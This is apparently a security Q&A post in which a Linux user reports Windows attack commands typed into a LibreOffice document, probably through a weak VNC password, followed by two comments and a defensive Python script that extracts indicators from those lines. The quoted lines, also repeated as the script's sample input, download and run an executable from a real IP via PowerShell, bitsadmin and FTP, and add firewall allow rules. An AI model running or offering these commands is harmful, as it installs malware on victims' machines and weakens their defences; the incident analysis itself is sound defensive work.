
I was AFK for a few hours. This is what I saw in my LibreOffice document when I returned to my laptop:

cmd.exe /c PoweExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/cawk.exe','%temp%\40006605040.exe');Start-Process '%temp%\40006605040.exe'
rcmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/cawk.exe %temp%\4950606004.exe&start %temp%\4950606004.exe
rcmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe “ok” ENABLE&netsh advfirewall firewall add rule name=”ok” dir=in action=allow program=”C:\Windows\System32\ftp.exe” enable=yes
rcmd.exe /c “cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get cawk.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start cawk.exe”

I am on Linux Mint, so the commands (Windows; PowerShell?) were obviously not targeted individually against my system but rather came from a random attack. Still, I wonder how this could happen. I was connected to the VPN network of my university during that time (using Cisco AnyConnect). I also had VNC running with a rather mediocre password. This is my only guess. Do you have any ideas? Should I be worried that my system is infected?

flxapps

  • If you are seeing your computer run commands that download random files via FTP and run them, and it's not in the correct shell language of the computer, then yes, your machine has been breached or the document you had open had a malicious macro. – schroeder Sep 23 '19 at 19:53
  • It's also possible that a malicious network program guessed your VNC password and just blindly tried to connect and run those commands. If win+r doesn't do anything then it may have just typed it out to your document instead. – user Sep 23 '19 at 19:56
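A triage helper for the four lines quoted in the question, added here as an example (it is not part of the original post or either comment): it pulls out the indicators a defender would block or report (the download host, URL and the file names dropped under %temp%), labels the download or firewall technique each line uses, and counts lines that begin with a stray "r" in front of cmd.exe, which is what the second comment's Win+R theory predicts. The regexes, technique names and report fields are this example's own.

```python
import re

# Sample input: the four lines from the question's LibreOffice document
# (copied from the post above; the curly quotes normalised to ASCII).
OBSERVED = r"""
cmd.exe /c PoweExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/cawk.exe','%temp%\40006605040.exe');Start-Process '%temp%\40006605040.exe'
rcmd.exe /c bitsadmin /transfer getitman /download /priority high http://92.63.197.153/cawk.exe %temp%\4950606004.exe&start %temp%\4950606004.exe
rcmd.exe /c netsh firewall add allowedprogram C:\Windows\System32\ftp.exe "ok" ENABLE&netsh advfirewall firewall add rule name="ok" dir=in action=allow program="C:\Windows\System32\ftp.exe" enable=yes
rcmd.exe /c "cd %temp%&@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get cawk.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start cawk.exe"
"""

# Technique labels (this example's own names) keyed by the token that gives
# each download or firewall-change method away in the observed lines.
TECHNIQUES = {
    "powershell_webclient": re.compile(r"WebClient\)\.DownloadFile", re.I),
    "bitsadmin_transfer": re.compile(r"\bbitsadmin\b.*/transfer", re.I),
    "firewall_allow_rule": re.compile(r"\bnetsh\b.*\bfirewall\b.*(allowedprogram|action=allow)", re.I),
    "ftp_script_download": re.compile(r"\bftp\s+-s:", re.I),
}
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
DROP_RE = re.compile(r"%temp%\\[\w.]+\.exe", re.I)
# A stray "r" glued to cmd.exe is what you would expect if the attacker sent
# Win+R (ignored by the Linux desktop) and then typed the command blindly, so
# the keystrokes landed in whatever window had focus; this is an inference.
STRAY_R_RE = re.compile(r"^r(?=cmd\.exe\b)", re.I)


def triage(text):
    """Extract indicators and technique labels from blindly typed command lines."""
    report = {"ips": set(), "urls": set(), "dropped_files": set(),
              "techniques": [], "stray_run_prefix_lines": 0}
    for raw in text.strip().splitlines():
        line = raw.strip()
        if not line:
            continue
        if STRAY_R_RE.match(line):
            report["stray_run_prefix_lines"] += 1
        report["ips"].update(IP_RE.findall(line))
        report["urls"].update(URL_RE.findall(line))
        report["dropped_files"].update(DROP_RE.findall(line))
        report["techniques"].extend(n for n, rx in TECHNIQUES.items() if rx.search(line))
    return report


if __name__ == "__main__":
    for key, value in triage(OBSERVED).items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

The same function works on any text a user pastes from a document or clipboard after a suspected VNC keystroke-injection incident; the sets are what to feed into a firewall block list or an abuse report.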

0 Answers